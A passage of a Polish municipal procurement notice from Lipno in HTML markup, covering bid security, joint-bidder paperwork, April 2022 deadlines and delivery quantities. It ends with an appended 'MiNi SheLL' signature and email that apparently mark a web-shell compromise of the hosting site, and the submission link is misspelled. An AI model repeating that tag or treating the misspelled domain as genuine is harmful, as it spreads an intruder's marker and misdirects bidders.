podstawowym nr RI.271.4.2022”<br/>Wykonawcy zobowiązani są do wniesienia wadium przed upływem terminu składania ofert, przy czym w przypadku wniesienia wadium w pieniądzu, kwota odpowiadająca wymaganej wysokości wadium musi zostać zaksięgowana na wskazanym rachunku bankowym Zamawiającego przed upływem terminu do złożenia oferty. <br/>6.	W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których mowa w pkt. 3 lit. b, c lub d, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.	Wadium, składane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, w formie gwarancji wadialnej lub poręczenia wadialnego musi w swojej treści wskazywać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub jeżeli w treści jako zleceniodawcę wskazano tylko jednego ze współwykonawców, odpowiedzialność gwaranta/poręczyciela musi obejmować również sytuacje, w których przyczyna zatrzymania wadium leży po stronie współwykonawców. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty Wykonawca zobowiązany jest dołączyć:<br/>1. aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu– zgodnie z<br/>Załącznikiem nr 2 do SWZ;<br/>UWAGA: w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, niniejsze<br/>oświadczenie składa każdy z wykonawców osobno;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – dotyczy oferty składanej przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy zawarte są w &#34;projekcie umowy&#34; stanowiącym załącznik nr<br/>4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę wraz z wymaganymi dokumentami nalezy umieścić na platformazakupowa.pl pod adresem: https://platforamzakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-01 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia wynosi:<br/>Tura nr I - do 1 miesiąca od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno – ilość: 750 Mg<br/>•	Wilkowice, Gmina Lipno – ilość:1250 Mg<br/>Tura nr II - do 3 miesięcy od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno – ilość: 500 Mg<br/>•	Wilkowice, Gmina Lipno – ilość: 1000 Mg<br/>Tura nr III stanowiąca prawo opcji: do 6 miesięcy od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno, powiat leszczyński – ilość: do 500 Mg<br/>•	Wilkowice, Gmina Lipno, powiat leszczyński – ilość: do 500 Mg

Creat By MiNi SheLL
Email: jattceo@gmail.com